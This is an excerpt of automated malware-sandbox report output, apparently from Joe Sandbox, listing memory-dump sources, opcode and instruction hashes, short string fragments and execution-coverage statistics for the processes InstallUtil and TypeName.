                                                                • Instruction ID: 59618bf60a226be304bd25742d8d80f3fb16995d866b2b8124a31ba71607aea5
                                                                • Opcode Fuzzy Hash: 907437ad854166af1d64661afc73965fe9b0e3ce779ef042f1debf0482f436d3
                                                                • Instruction Fuzzy Hash: 3011E9397049119FC7199B39D8A463E7792BFC47527150279ED06CB360CF31DC468780
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31da711abccb9b4d8fddb4982164abf5b012937310c834d705e4227757d6641b
                                                                • Instruction ID: 1f38b2b218b38af9aaa81aa2b541aa747d6878294e5c886978b2be2fdc297b78
                                                                • Opcode Fuzzy Hash: 31da711abccb9b4d8fddb4982164abf5b012937310c834d705e4227757d6641b
                                                                • Instruction Fuzzy Hash: 88110635A00249DFDF20CF69C840B9EBBF2EF84311F048295D8149B291D370F898CB99
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ac7ac4733b6020ea5fdf7f258de0e66e126b929fdbfb55727b0eb8bbdecb428
                                                                • Instruction ID: f557017ffc31073cd064f052596c34ee1b37daf2332fdc06eaf21bd57739884a
                                                                • Opcode Fuzzy Hash: 7ac7ac4733b6020ea5fdf7f258de0e66e126b929fdbfb55727b0eb8bbdecb428
                                                                • Instruction Fuzzy Hash: E5117C359002089FDB24CF94C848BAABBF5EB48355F40C56EE8199B251D775DA98CF50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476127713.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_bfd000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction ID: 0b328ff9c9545a8aec4f79adcf028194656aaab1fb8c277385f88a86b131b7fb
                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction Fuzzy Hash: A711E472404244CFCB12CF00D5C4B26BFB2FB94314F24C5A9D9090B656C336E45ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476127713.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_bfd000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction ID: a72fea22f50397a2321b9d6449882306ce68b68bd1b5d1ddb147fb22df83c630
                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction Fuzzy Hash: E811D376504244CFDB16DF10D5C4B26BFB2FBA8314F24C5A9D9090B256C336D85ADBA2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edbd1e89a971e1fa98b6220757084218e05185bfcb6c39877a076c8a3fb56b0f
                                                                • Instruction ID: b394277b03366358893af00d57744fda92c5175fe677b955b9bd375aed461f45
                                                                • Opcode Fuzzy Hash: edbd1e89a971e1fa98b6220757084218e05185bfcb6c39877a076c8a3fb56b0f
                                                                • Instruction Fuzzy Hash: 521123B6800249DFDB10DF99C845BDEBFF8FB48320F14841AEA58A7250C339A590DFA5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7900a98be246c3a2faae3c30b9ccf111a74c6119f422f0b064f0d364be6023a3
                                                                • Instruction ID: 7c32f99ab6a85283693ee708277ba68070e60db0f4a84d30920c62b84833e436
                                                                • Opcode Fuzzy Hash: 7900a98be246c3a2faae3c30b9ccf111a74c6119f422f0b064f0d364be6023a3
                                                                • Instruction Fuzzy Hash: 4701B9307052445FD705567A5C656BFAEDFAFCA350F1445BBE906C72D6CD288D0AC360
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ecaae432d6f44f29e8ff6bfb6172910c81b65466b775cb4ade4afc2905fb843
                                                                • Instruction ID: bb9b1504d476883f12cfb445b8b82ee93fa8560e643f514dc91da3189369deb8
                                                                • Opcode Fuzzy Hash: 7ecaae432d6f44f29e8ff6bfb6172910c81b65466b775cb4ade4afc2905fb843
                                                                • Instruction Fuzzy Hash: 621126B6800249DFDB10DF99C945BEEBFF5FB48320F14841AE958A7610C339A950DFA5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee357be3630c6cd244906de13e77a0b784e6aca918e93bc44689582709d39972
                                                                • Instruction ID: 68ba265ae0943eaa13cfd9a3fefc06f930bd91aa5613988861b65488bcdb0f7d
                                                                • Opcode Fuzzy Hash: ee357be3630c6cd244906de13e77a0b784e6aca918e93bc44689582709d39972
                                                                • Instruction Fuzzy Hash: 23216DB4D041099FCB49EFB8D981B9EBFF6FF45300F5085A9D0149B269E7744A49CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c55910bbc1bd15f407b20f6406f1e6f6923bab0ba80b2ce5b1ee87771be02ca3
                                                                • Instruction ID: 59776f772a5c7b9cbcf566c685b7584288e180709ccc58acc83113ef19dbf8dd
                                                                • Opcode Fuzzy Hash: c55910bbc1bd15f407b20f6406f1e6f6923bab0ba80b2ce5b1ee87771be02ca3
                                                                • Instruction Fuzzy Hash: BE117CB4D001099FCB49EFB8D981B9EBBF6FF44300F4085A9D0189B269EB345A49CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 259b78a41c12f25d8c584773226e6f3f4ba36f083775519311cdb5c98a45abda
                                                                • Instruction ID: 17e1557e8e9958e8ba0e888c88d7fb78420b3dae7ad2eebe6049ede2f2bbc979
                                                                • Opcode Fuzzy Hash: 259b78a41c12f25d8c584773226e6f3f4ba36f083775519311cdb5c98a45abda
                                                                • Instruction Fuzzy Hash: 7221E2B4D052098FCB01EFA8C9456EEBFF4BB09301F14426AD805B7261EB305A49CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72e3f430ba233f3cd0e21023c908e3786b4ea946e75c22f219d577b1e33fa963
                                                                • Instruction ID: 87ca2d287121dc29378ed3c709c917ba6a9d0a433f24441c2fdf6e47c64b4b36
                                                                • Opcode Fuzzy Hash: 72e3f430ba233f3cd0e21023c908e3786b4ea946e75c22f219d577b1e33fa963
                                                                • Instruction Fuzzy Hash: 19110074F001498FDB05DFE8D960BEEBBB6BF48321F509465E908A7349E7309942CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476233079.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c0d000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                • Instruction ID: 1ff44c69491d41cdff694b5cf377ad07c925ba35eff1d6a3408480ebd8565773
                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                • Instruction Fuzzy Hash: 3D11DD75504284CFCB12CF50D9C4B15BFA2FB84328F24C6A9D84A4B692C33AD84ACF62
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61cf4b2c5dfe58dbfa9b7064cf825da69738f48ee237961444c8d5b18b8e25db
                                                                • Instruction ID: fe663ec8da5af7d40a984c9b74886bbbc644c0748275cd500a0a203e3363cbbc
                                                                • Opcode Fuzzy Hash: 61cf4b2c5dfe58dbfa9b7064cf825da69738f48ee237961444c8d5b18b8e25db
                                                                • Instruction Fuzzy Hash: DF01F571604244AFCB028E659810BFF3BE7DFC9762F18807AF914CB290CE758D468BA1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c580b5243523737c4df9aa8bf045529fdef1d65124a8f1a63711b4e7de9bafc
                                                                • Instruction ID: 7b1a2eb636b5d1d6183812ddb4d3dbf288242bf2e1aff9a109fb7e3a9945fbda
                                                                • Opcode Fuzzy Hash: 9c580b5243523737c4df9aa8bf045529fdef1d65124a8f1a63711b4e7de9bafc
                                                                • Instruction Fuzzy Hash: 7AF089363001196F8F055FA9A8519EF7BAFEFC8360B40482AFA05C7351DE359D1197A5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d39db9482febd57d9a8699affdf00bb504c015554e6a2781f0a9b48f8f60ee7
                                                                • Instruction ID: 1eddaf05f3ecee1951924dc79e73bcc54b7cd90faa61b65c18f14209f0a3971b
                                                                • Opcode Fuzzy Hash: 7d39db9482febd57d9a8699affdf00bb504c015554e6a2781f0a9b48f8f60ee7
                                                                • Instruction Fuzzy Hash: 55F055309046849EEB028B75AC143FE7F709B8F312F8850A8D4449B162CB764506CB50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a07e52ebf80ecf18e5faa55add46c86733efccf9cb5cf1474ad8e71ea1ccb81
                                                                • Instruction ID: 1506372e2ae7a0a4eb42a229c67bc704837d4171c005a93a1a5bf3ef4b1a7c92
                                                                • Opcode Fuzzy Hash: 3a07e52ebf80ecf18e5faa55add46c86733efccf9cb5cf1474ad8e71ea1ccb81
                                                                • Instruction Fuzzy Hash: 74F05534908284CFCB068BB49C183FA7B709BCB302F0804A8C401660B2DBB1861DCA80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 04426169f61a4d7812eee36d2bcffe35674aa9ea305bfc5615252b9e1bb0665d
                                                                • Instruction ID: 6a174e62bbab5b66c0a2922abe4906a94dde7329a40a513acd4f8a1eb963845a
                                                                • Opcode Fuzzy Hash: 04426169f61a4d7812eee36d2bcffe35674aa9ea305bfc5615252b9e1bb0665d
                                                                • Instruction Fuzzy Hash: 37E0D896C08240CFD7218BA654160B97F34CCE734374450D7D44687121E328D659EB15
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "$0oMp$Hnq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq
                                                                • API String ID: 0-1284651843
                                                                • Opcode ID: 024943d62971ea3f0312312ec59aa3cd36641bedf5d4d861f85cc1db27909517
                                                                • Instruction ID: 8c68039853c8d5a31d3678828c53600acf084d41161b6798204d12f437f05fd5
                                                                • Opcode Fuzzy Hash: 024943d62971ea3f0312312ec59aa3cd36641bedf5d4d861f85cc1db27909517
                                                                • Instruction Fuzzy Hash: EE12C3B4E002188FDB58DF65D994BDDBBB2BF89300F1080A9D809AB365DB759E85CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xnq$Xnq$Xnq$Xnq
                                                                • API String ID: 0-1335687363
                                                                • Opcode ID: f57d536448d5723c80d709155d9e7960ebac98178388cf413c8288e8a8ff669f
                                                                • Instruction ID: 400d636891179fd6b137ee9ba246bd91c614ace802117391dde4776dd0691f49
                                                                • Opcode Fuzzy Hash: f57d536448d5723c80d709155d9e7960ebac98178388cf413c8288e8a8ff669f
                                                                • Instruction Fuzzy Hash: C731A738E002198BDF648B68C94576FB6F6BF9A311F244179C825A7254DB30CEC9CB96
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \;jq$\;jq$\;jq$\;jq
                                                                • API String ID: 0-138087212
                                                                • Opcode ID: edad131f8cfcad684c5f691d0ed30b5f80b1c438c5f25b5825c2c88ed445b247
                                                                • Instruction ID: f18ce3b285d8662b8541f453a229180a3cee99f85322aff3bbb2311b285fa252
                                                                • Opcode Fuzzy Hash: edad131f8cfcad684c5f691d0ed30b5f80b1c438c5f25b5825c2c88ed445b247
                                                                • Instruction Fuzzy Hash: BE01BC397405248FC7208E2DC55092A77EAAFD8762365816AE812CB3F0DE32DCC98788

                                                                Execution Graph

                                                                Execution Coverage:10.3%
                                                                Dynamic/Decrypted Code Coverage:98.6%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:279
                                                                Total number of Limit Nodes:7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                • Opcode ID: ec7d624f7b09f1251f4aa2fea1911d712a5b270328f8e9d3acb4c5c755ac19a4
                                                                • Instruction ID: 106f9475b64fce7c3b4314fd2b0e04b43dccfd40af997406a46c9df550f64de6
                                                                • Opcode Fuzzy Hash: ec7d624f7b09f1251f4aa2fea1911d712a5b270328f8e9d3acb4c5c755ac19a4
                                                                • Instruction Fuzzy Hash: AB628B70A006158FCB95CFAAC49866EFBF2FF88300F24852DE556D7391DB30A945CB95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Dqq
                                                                • API String ID: 0-373195589
                                                                • Opcode ID: 4be2ef8d18d537094352ea14f1afbc1d067816fc5363fd1e83bc933ebf2b7fe3
                                                                • Instruction ID: ff5a22698471303879b547a7f1c4f00f5dbcad6069b9ec1ce149b77103ec30de
                                                                • Opcode Fuzzy Hash: 4be2ef8d18d537094352ea14f1afbc1d067816fc5363fd1e83bc933ebf2b7fe3
                                                                • Instruction Fuzzy Hash: 7ED1E3B4E01219CFDB54DFA9D994A9DBBB2FF88300F1081A9D409AB3A5DB359D81CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 61f675b223e666cd129047d119300ec5dc7a2f23ffefb5cd297ac2579dcef056
                                                                • Instruction ID: ea846b273321fb84068697716cf7383f1e1c32b24440673b05024f5da9d654f0
                                                                • Opcode Fuzzy Hash: 61f675b223e666cd129047d119300ec5dc7a2f23ffefb5cd297ac2579dcef056
                                                                • Instruction Fuzzy Hash: 1BC1F670E05218CFDBA4DFA9D848BADBBF6FF89304F5081A9D409A7255DB749A85CF00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 3af276ed0e5cd99d54bc0fa646ffdfebafba9b8141b014dfa81918196d337203
                                                                • Instruction ID: 477d67166c1937d6984e1c7915d0a917189b162e5b83a9340b2b076a0f0f4a8c
                                                                • Opcode Fuzzy Hash: 3af276ed0e5cd99d54bc0fa646ffdfebafba9b8141b014dfa81918196d337203
                                                                • Instruction Fuzzy Hash: ABB1E670E05218CFEBA4DFAAD848BADBBF6FF89304F5090A9D409A7255D7749985CF00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$(nq$Hnq
                                                                • API String ID: 0-1151833592
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !$)
                                                                • API String ID: 0-1972669455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$&
                                                                • API String ID: 0-3870246384
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A$T
                                                                • API String ID: 0-334973614
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq
                                                                • API String ID: 0-2756854522
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 7
                                                                • API String ID: 0-1790921346
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: j
                                                                • API String ID: 0-2137352139
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: &
                                                                • API String ID: 0-1010288
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
